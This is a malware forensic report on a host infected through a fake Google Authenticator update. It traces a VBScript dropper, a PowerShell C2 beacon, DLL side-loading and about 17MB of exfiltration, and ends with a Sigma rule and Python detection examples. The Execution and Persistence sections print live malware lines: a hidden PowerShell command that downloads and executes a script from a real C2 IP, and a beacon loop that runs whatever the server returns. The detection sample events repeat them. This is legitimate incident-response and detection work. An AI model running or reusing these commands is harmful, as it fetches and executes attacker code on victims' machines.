Executive Summary

In the modern threat landscape, Social Engineering remains a dominant Initial Access vector. This report details the forensic analysis of a compromised host (WIN-GSH54QLW48D) infected via a malicious software installer masquerading as a Google Authenticator update.

The investigation revealed a sophisticated, multi-stage infection chain. The process began with a VBScript-based dropper that utilized an Azure-themed decoy to distract the user. This was followed by the deployment of a PowerShell-based persistent downloader and the use of DLL Side-Loading techniques to evade EDR detection. The threat actor successfully established Command and Control (C2) channels, leading to the unauthorized exfiltration of approximately 17MB of data to external nodes.

1. Initial Access: The "Typosquatting" Trap

The infection originated from user interaction with a deceptive domain. Network traffic analysis revealed a DNS query for google-authenticator[.]burleson-appliance[.]net., followed by an HTTPS connection.

While the specific payload delivery was encrypted via TLS, the sequence of events (DNS resolution followed by immediate persistent execution artifacts) confirms that this landing page acted as the delivery mechanism for the initial payload.

Network Artifacts:

  • Domain: google-authenticator[.]burleson-appliance[.]net.
  • Protocol: HTTPS (Port 443)
  • Evidence: DNS Query & TLS Client Hello.
Caption: Wireshark capture of the DNS query for the typosquatted domain google-authenticator[.]burleson-appliance[.]net.
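The DNS hunt the Key Takeaways recommend, as an added example that is not part of the original write-up: it scans constructed DNS query records for names that carry a brand keyword in their subdomain labels while the registered domain belongs to someone else, which is exactly the shape of the google-authenticator[.]burleson-appliance[.]net lookup above. The log lines, the allow-list of brand-owned domains and the two-label registered-domain rule are assumptions made for the example.

```python
import re

# Constructed DNS query records (not from the real capture), reduced to the
# "timestamp client qname" shape a Zeek dns.log or Sysmon Event ID 22 export
# can be flattened to. The first line mirrors the lookup seen in this case.
SAMPLE_DNS_LOG = """\
2024-01-01T10:00:01Z 10.0.0.15 google-authenticator.burleson-appliance.net.
2024-01-01T10:00:05Z 10.0.0.15 accounts.google.com.
2024-01-01T10:01:12Z 10.0.0.22 teams.microsoft.com.
2024-01-01T10:02:40Z 10.0.0.22 microsoft-teams-update.example-cdn.org.
2024-01-01T10:03:03Z 10.0.0.15 login.microsoftonline.com.
"""

# Brand keyword -> registered domains that legitimately carry it.
# Assumed allow-list for illustration; a real one comes from the org's own data.
BRAND_OWNERS = {
    "google": {"google.com", "googleapis.com"},
    "authenticator": {"google.com", "microsoft.com"},
    "microsoft": {"microsoft.com", "microsoftonline.com"},
    "teams": {"microsoft.com"},
}


def registered_domain(qname):
    """Naive eTLD+1: the last two labels. Multi-part suffixes such as co.uk
    need a public-suffix list, which is out of scope here."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def find_impersonating_queries(log_text):
    """Return (client, qname, brand) for every query whose subdomain labels
    contain a brand keyword while the registered domain is not brand-owned."""
    findings = []
    for line in log_text.splitlines():
        ts, client, qname = line.split()
        reg = registered_domain(qname)
        # Everything left of the registered domain, with separators spaced out
        # so that \b word matching treats "google-authenticator" as two words.
        subdomain = qname.rstrip(".").lower()[: -len(reg)].rstrip(".")
        words = subdomain.replace("-", " ").replace(".", " ")
        for brand, owners in BRAND_OWNERS.items():
            if re.search(rf"\b{brand}\b", words) and reg not in owners:
                findings.append((client, qname, brand))
                break
    return findings
```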

2. Execution Phase: Decoys and Droppers

The execution phase is characterized by a multi-stage approach designed to minimize user suspicion. After the initial interaction with the fake "Google Authenticator" page, the infection chain continues with a sophisticated dropper mechanism.

The Decoy Strategy

A critical finding in the HTTP streams revealed a Stage 2 dropper using an XML-embedded VBScript. To evade detection and distract the victim, the script utilizes a decoy tactic: it opens the legitimate Microsoft Azure website while silently executing malicious commands in the background.

VBScript Analysis:

objShell.Run("cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command ""start-process 'https://azure.microsoft.com'; iex (new-object System.Net.WebClient).'DownloadString'('http://5.252.153.241:80/api/file/get-file/29842.ps1');#URL: https://teams.microsoft.com""")

Key Observations:

  • Stealth: The use of -WindowStyle Hidden ensures the PowerShell terminal remains invisible to the user.
  • Misdirection: Opening azure.microsoft.com provides a false sense of security, making the user believe they are interacting with a legitimate Microsoft service.
  • Obfuscated Metadata: The script includes a comment #URL: https[:]//teams[.]microsoft[.]com, likely intended to mislead automated sandboxes or human analysts.
Caption: Malicious VBScript dropper captured in an HTTP stream, displaying the Azure decoy and hidden PowerShell command.

DLL Side-Loading (T1574.002)

Parallel to the scripting engine, the attack leverages DLL Side-loading. The payload often includes a legitimate, digitally signed binary (e.g., TeamViewer[.]exe) bundled with a malicious dynamic link library (TV[.]dll). Upon execution, the trusted binary loads the malicious DLL, allowing the threat actor to execute code within a legitimate process context, effectively bypassing many EDR solutions.

Caption: VirusTotal analysis of the malicious TV.dll, showing a high detection rate (45/71) and confirming the threat level of the sideloaded library.

3. Persistence: The PowerShell Beacon

Following the execution of the VBScript trigger, the infected host initiates a second-stage GET request to fetch the primary payload: pas.ps1. This script is the "brain" of the persistence mechanism.

Payload Delivery

The delivery of the PowerShell script was captured in a clear-text HTTP stream. The server at 5[.]252[.]153[.]241 responded with a script that, while partially obfuscated, reveals its malicious intent upon closer inspection.

Caption: HTTP stream capturing the delivery of the obfuscated second-stage PowerShell script (pas[.]ps1).

Deobfuscation and Logic Analysis

The malware established persistence using a script identified as pas.ps1. The script was obfuscated, but utilizing CyberChef, I was able to decode its logic.

Decoded Logic Analysis: The script performs the following actions:

  1. Fingerprinting: Queries the Serial Number of the C:\ drive to generate a unique victim ID.
  2. C2 URL Construction: The unique Serial Number is then appended to the C2 IP address to form a personalized beaconing URL.
  3. Beaconing: Enters an infinite loop (while ($true)), sending requests to the C2 server every 5 seconds.
  4. Fileless Execution: Uses Invoke-Expression (IEX) to execute incoming payloads directly in memory.
# Snippet of the decoded script logic
$fso = New-Object -Com "Scripting.FileSystemObject"
# Volume serial number of the C: drive becomes the victim ID
$SerialNumber = $fso.GetDrive("c:\").SerialNumber
$ip = 'http://5.252.153.241/'
# Per-victim beacon URL: C2 base address followed by the serial number
$url = $ip + $SerialNumber
# ... ($s, the object whose DownloadString method is called below, is created in the elided part)
while ($true) {
    try {
        $result = $s.DownloadString($url)
    }
    # ... (catch block and 5-second delay elided)
    # Whatever the C2 returns is executed in memory, never written to disk
    Invoke-Expression $result
}
Caption: Deobfuscating the pas.ps1 script in CyberChef to reveal hardware fingerprinting and C2 beaconing logic.

4. Post-Exploitation: Network Anomalies & Data Exfiltration

While many initial alerts focus on the infection vector, the true impact is revealed through the analysis of post-exploitation network behavior. In this case, the primary objective of the threat actor appears to be Data Exfiltration.

Command and Control (C2) Stealth

One of the most tactical aspects of this campaign is how the malware masks its Command and Control traffic. By utilizing legitimate TeamViewer infrastructure (e.g., master16.teamviewer[.]com), the threat actor attempts to blend in with normal administrative activity.

A closer look at the traffic reveals encoded parameters sent via din.aspx. This is a classic indicator of a custom C2 protocol tunneled through a trusted domain.

Caption: Suspicious beaconing activity to TeamViewer-related domains using encoded din.aspx parameters.

Analyzing the Exfiltration Channels

A deep dive into the TCP conversations revealed a significant volume of outbound traffic directed at two primary external nodes.

The most alarming discovery was the connection to 45[.]125[.]66[.]32. The transfer of approximately 10MB of data over non-standard ports (TCP 2917 and 49792) using TLS encryption is a high-fidelity indicator of data theft. Standard web traffic (HTTPS) typically utilizes port 443; the use of high-range, non-standard ports is a common tactic for custom C2 protocols or data exfiltration tools to bypass basic firewall egress rules.

Exfiltration Summary:

  • Node A: 45[.]125[.]66[.]32, 10 MB (transferred via non-standard ports)
  • Node B: 5[.]252[.]153[.]241, 7 MB (the same node used for payload delivery and C2 beaconing)
Caption: TCP Conversation statistics highlighting significant data exfiltration to 45[.]125[.]66[.]32 (10 MB).
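The conversation-statistics triage described above, as an added example that is not part of the original write-up: it aggregates outbound bytes per external destination from constructed TCP conversation rows and rates a destination "high" when a large volume left over ports other than 80/443, which is the pattern observed for 45[.]125[.]66[.]32. The byte counts, the 1 MB threshold and the port allow-list are assumptions made for the example.

```python
import ipaddress

# Constructed TCP conversation rows modelled on the Wireshark "Conversations"
# statistics discussed above (illustrative values, not the real capture):
# (src, dst, dst_port, bytes_src_to_dst, bytes_dst_to_src)
SAMPLE_CONVERSATIONS = [
    ("10.0.0.15", "45.125.66.32",  2917,  6_500_000,   120_000),
    ("10.0.0.15", "45.125.66.32",  49792, 3_500_000,    80_000),
    ("10.0.0.15", "5.252.153.241", 80,    7_000_000,    60_000),  # delivery/C2 node
    ("10.0.0.15", "142.250.80.46", 443,     250_000, 1_900_000),  # ordinary HTTPS
    ("10.0.0.15", "10.0.0.7",      445,   9_000_000,   500_000),  # internal SMB, ignored
]

STANDARD_EGRESS_PORTS = {80, 443}
MIN_OUTBOUND_BYTES = 1_000_000  # assumed threshold: 1 MB out before we report a host


def is_external(ip):
    """True for globally routable addresses (excludes RFC1918, loopback, link-local)."""
    return ipaddress.ip_address(ip).is_global


def flag_exfil(conversations, min_bytes=MIN_OUTBOUND_BYTES):
    """Aggregate outbound bytes per external destination and report the ones
    above min_bytes, largest first. Severity is "high" if any of the traffic
    used a non-standard port, otherwise "medium"."""
    totals = {}
    for src, dst, port, out_bytes, in_bytes in conversations:
        if not is_external(dst):
            continue  # lateral traffic needs a different baseline
        entry = totals.setdefault(dst, {"bytes_out": 0, "ports": set()})
        entry["bytes_out"] += out_bytes
        entry["ports"].add(port)
    findings = []
    for dst, entry in totals.items():
        if entry["bytes_out"] < min_bytes:
            continue
        odd_ports = entry["ports"] - STANDARD_EGRESS_PORTS
        findings.append({"dst": dst, "bytes_out": entry["bytes_out"],
                         "ports": sorted(entry["ports"]),
                         "severity": "high" if odd_ports else "medium"})
    return sorted(findings, key=lambda f: f["bytes_out"], reverse=True)
```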

Conclusion on Objectives

The volume of data transferred (totaling ~17MB) suggests that the malware successfully harvested sensitive information from the host. Given the initial decoy (Microsoft Azure/Teams), it is highly likely that the attacker targeted session tokens, browser credentials, or local documents before the activity was captured.

5. Detection Engineering: Sigma Rule

Based on the analysis of pas.ps1, I created a custom Sigma rule to detect the specific drive fingerprinting technique used by this malware family.

title: PowerShell Drive Serial Number Reconnaissance
id: custom-detect-ps-drive-serial
status: experimental
description: Detects PowerShell scripts utilizing Scripting.FileSystemObject to query drive serial numbers. This technique is often used by malware for victim fingerprinting.
author: MabLevi
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains|all:
            - 'New-Object'
            - 'Scripting.FileSystemObject'
            - 'SerialNumber'
    condition: selection
level: medium
tags:
    - attack.discovery
    - attack.t1082
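The detection logic of the Sigma rule above together with the hidden download cradle from Section 2, run over sample events as an added example that is not part of the original write-up. Because pas.ps1 is fetched with DownloadString and run through Invoke-Expression, its FileSystemObject/SerialNumber strings never reach the process command line; they show up only when PowerShell script block logging (Event ID 4104) is enabled, so the example keys the fingerprint and beacon indicators to that source and the cradle indicator to process creation. The event records, field names and regexes are constructed for the example.

```python
import re

# Constructed sample events modelled on the artifacts in this write-up
# (not real log exports): two Sysmon-style process-creation records and
# one PowerShell 4104 script-block record holding the decoded pas.ps1 logic.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "evt-1", "source": "process_creation", "image": POWERSHELL,
     "text": "powershell -NoProfile -WindowStyle Hidden -Command \"start-process "
             "'https://azure.microsoft.com'; iex (new-object System.Net.WebClient)"
             ".'DownloadString'('http://5.252.153.241:80/api/file/get-file/29842.ps1')\""},
    {"id": "evt-2", "source": "ps_script", "image": "",
     "text": "$fso = New-Object -Com \"Scripting.FileSystemObject\"\n"
             "$SerialNumber = $fso.GetDrive(\"c:\\\").SerialNumber\n"
             "$url = 'http://5.252.153.241/' + $SerialNumber\n"
             "while ($true) { try { $result = $s.DownloadString($url) } catch {}\n"
             "  Start-Sleep -Seconds 5; Invoke-Expression $result }"},
    {"id": "evt-3", "source": "process_creation", "image": POWERSHELL,
     "text": "powershell -NoProfile -File C:\\scripts\\inventory.ps1"},
]

# Indicator name, the log source it belongs to, and case-insensitive regexes
# that must ALL match (the same AND logic as a Sigma contains|all modifier).
INDICATORS = [
    ("hidden_download_cradle", "process_creation",
     [r"-WindowStyle\s+Hidden", r"\biex\b|Invoke-Expression", r"DownloadString"]),
    ("drive_serial_fingerprint", "ps_script",
     [r"New-Object", r"Scripting\.FileSystemObject", r"\.SerialNumber"]),
    ("infinite_iex_beacon", "ps_script",
     [r"while\s*\(\s*\$true\s*\)", r"DownloadString", r"\biex\b|Invoke-Expression"]),
]


def match_indicators(event):
    """Return the names of every indicator whose patterns all match the event."""
    # Mirror the Sigma rule's Image|endswith filter for process-creation events
    if event["source"] == "process_creation" and not event["image"].lower().endswith(
            ("\\powershell.exe", "\\pwsh.exe")):
        return []
    return [name for name, source, patterns in INDICATORS
            if event["source"] == source
            and all(re.search(p, event["text"], re.IGNORECASE) for p in patterns)]


def triage(events):
    """Map event id -> matched indicator names, keeping only events with hits."""
    result = {}
    for event in events:
        hits = match_indicators(event)
        if hits:
            result[event["id"]] = hits
    return result
```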

6. MITRE ATT&CK Mapping

The observed activities map to the following MITRE ATT&CK techniques:


7. Indicators of Compromise (IOCs)


Conclusion

This investigation illustrates the increasing sophistication of initial access campaigns. By combining Social Engineering (typosquatted domains) with multi-stage delivery mechanisms like VBScript droppers and Azure-themed decoys, threat actors can effectively bypass traditional perimeter defenses and elude user suspicion.

The shift towards "fileless" persistence via PowerShell and the use of legitimate binaries for DLL side-loading demonstrates a clear intent to remain stealthy within the environment. However, as shown in this analysis, these activities leave distinct network footprints.

Key Takeaways for Defenders:

  • Endpoint Visibility: Monitoring for PowerShell execution with high-risk arguments (e.g., Invoke-Expression, WindowStyle Hidden) is critical for detecting early-stage persistence.
  • Network Hygiene: Alerting on large data transfers over non-standard ports (like TCP 2917) can help identify exfiltration attempts that bypass standard web filters.
  • DNS Monitoring: Proactive hunting for typosquatted domains impersonating common corporate tools (Teams, Google Authenticator) remains one of the most effective ways to break the attack chain at the reconnaissance stage.

By maintaining deep visibility into both host behavior and network anomalies, SOC teams can transition from reactive alerting to proactive threat hunting.
